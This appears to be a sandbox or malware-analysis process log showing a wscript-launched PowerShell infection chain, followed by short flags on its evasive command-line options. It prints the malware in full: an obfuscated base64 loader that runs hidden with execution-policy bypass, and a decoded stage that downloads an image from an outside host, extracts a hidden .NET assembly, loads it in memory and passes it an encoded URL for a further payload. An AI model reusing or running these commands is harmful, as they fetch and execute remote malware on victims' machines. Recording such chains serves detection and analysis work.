parent_process wscript.exe martian_process powershell -command "$Codigo = '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CcUzBkdIZQB4ShUWCcUzBkdIE8ShUWCcUzBkdIZgShUWCcUzBkdIoShUWCcUzBkdICQShUWCcUzBkdIZQBuShUWCcUzBkdIGQShUWCcUzBkdIRgBsShUWCcUzBkdIGEShUWCcUzBkdIZwShUWCcUzBkdIpShUWCcUzBkdIDsShUWCcUzBkdIJShUWCcUzBkdIBzShUWCcUzBkdIHQShUWCcUzBkdIYQByShUWCcUzBkdIHQShUWCcUzBkdISQBuShUWCcUzBkdIGQShUWCcUzBkdIZQB4ShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdILQBnShUWCcUzBkdIGUShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIwShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdILQBhShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIShUWCcUzBkdIgShUWCcUzBkdICQShUWCcUzBkdIZQBuShUWCcUzBkdIGQShUWCcUzBkdISQBuShUWCcUzBkdIGQShUWCcUzBkdIZQB4ShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdILQBnShUWCcUzBkdIHQShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIkShUWCcUzBkdIHMShUWCcUzBkdIdShUWCcUzBkdIBhShUWCcUzBkdIHIShUWCcUzBkdIdShUWCcUzBkdIBJShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIBlShUWCcUzBkdIHgShUWCcUzBkdIOwShUWCcUzBkdIkShUWCcUzBkdIHMShUWCcUzBkdIdShUWCcUzBkdIBhShUWCcUzBkdIHIShUWCcUzBkdIdShUWCcUzBkdIBJShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIBlShUWCcUzBkdIHgShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIrShUWCcUzBkdID0ShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIkShUWCcUzBkdIHMShUWCcUzBkdIdShUWCcUzBkdIBhShUWCcUzBkdIHIShUWCcUzBkdIdShUWCcUzBkdIBGShUWCcUzBkdIGwShUWCcUzBkdIYQBnShUWCcUzBkdIC4ShUWCcUzBkdITShUWCcUzBkdIBlShUWCcUzBkdIG4ShUWCcUzBkdIZwB0ShUWCcUzBkdIGgShUWCcUzBkdIOwShUWCcUzBkdIkShUWCcUzBkdIGIShUWCcUzBkdIYQBzShUWCcUzBkdIGUShUWCcUzBkdINgShUWCcUzBkdI0ShUWCcUzBkdIEwShUWCcUzBkdIZQBuShUWCcUzBkdIGcShUWCcUzBkdIdShUWCcUzBkdIBoShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdIPQShUWCcUzBkdIgShUWCcUzBkdICQShUWCcUzBkdIZQBuShUWCcUzBkdIGQShUWCcUzBkdISQBuShUWCcUzBkdIGQShUWCcUzBkdIZQB4ShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdILQShUWCcUzBkdIgShUWCcUzBkdICQShUWCcUzBkdIcwB0ShUWCcUzBkdIGEShUWCcUzBkdIcgB0ShUWCcUzBkdIEkShUWCcUzBkdIbgBkShUWCcUzBkdIGUShUWCcUzBkdIeShUWCcUzBkdIShUWCcUzBkdI7ShUWCcUzBkdICQShUWCcUzBkdIYgBhShUWCcUzBkdIHMShUWCcUzBkdIZQShUWCcUzBkdI2ShUWCcUzBkdIDQShUWCcUzBkdIQwBvShUWCcUzBkdIG0ShUWCcUzBkdIbQBhShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIShUWCcUzBkdIgShUWCcUzBkdID0ShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIkShUWCcUzBkdIGkShUWCcUzBkdIbQBhShUWCcUzBkdIGcShUWCcUzBkdIZQBUShUWCcUzBkdIGUShUWCcUzBkdIeShUWCcUzBkdIB0ShUWCcUzBkdIC4ShUWCcUzBkdIUwB1ShUWCcUzBkdIGIShUWCcUzBkdIcwB0ShUWCcUzBkdIHIShUWCcUzBkdIaQBuShUWCcUzBkdIGcShUWCcUzBkdIKShUWCcUzBkdIShUWCcUzBkdIkShUWCcUzBkdIHMShUWCcUzBkdIdShUWCcUzBkdIBhShUWCcUzBkdIHIShUWCcUzBkdIdShUWCcUzBkdIBJShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIBlShUWCcUzBkdIHgShUWCcUzBkdILShUWCcUzBkdIShUWCcUzBkdIg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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('ShUWCcUzBkdI','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
parent_process powershell.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/634/676/original/rumpe.jpg?1697053529';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LjQ2ZXNhYmVsaWZkZXRhZHB1ZGlvcmRkZW1tYWhvbS80NzEuNzMuNDUyLjU4MS8vOnB0dGg=' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe